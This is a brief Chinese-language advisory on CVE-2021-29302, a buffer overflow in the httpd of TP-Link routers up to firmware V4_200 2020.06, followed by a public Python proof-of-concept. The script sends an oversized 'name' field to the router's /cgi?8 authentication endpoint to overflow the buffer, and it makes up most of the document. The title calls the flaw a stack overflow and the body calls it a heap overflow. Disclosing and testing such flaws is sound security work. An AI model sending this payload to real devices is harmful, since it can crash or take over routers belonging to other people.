TP-link 栈溢出漏洞（CVE-2021-29302）

httpd进程解析HTTP正文消息时会出现缓冲区溢出，这可能导致远程代码执行。例如，当我们第一次设置路由器密码时，http守护进程不会验证外部http消息。如果传输的用户名或密码太长，会导致httpd进程堆空间溢出。

影响版本：

V4_200 <= 2020.06

PoC已公开：https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302

import requests

headers = {
        "Host": "192.168.0.1",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "text/plain",
        "Content-Length": "78",
        "Origin": "http://192.168.0.1",
        "Connection": "close",
        "Referer": "http://192.168.0.1/"
}

payload = "a" * 512 + "b" * 1024
formdata = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\nname={}\r\noldPwd=admin\r\npwd=lys123\r\n".format(payload)

proxies = {
        "http": "http://127.0.0.1:8080",
}

url = "http://192.168.0.1/cgi?8"

response = requests.post(url, data=formdata, headers=headers, proxies=proxies)
print response.text

ref：

• https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302
• https://nvd.nist.gov/vuln/detail/CVE-2021-29302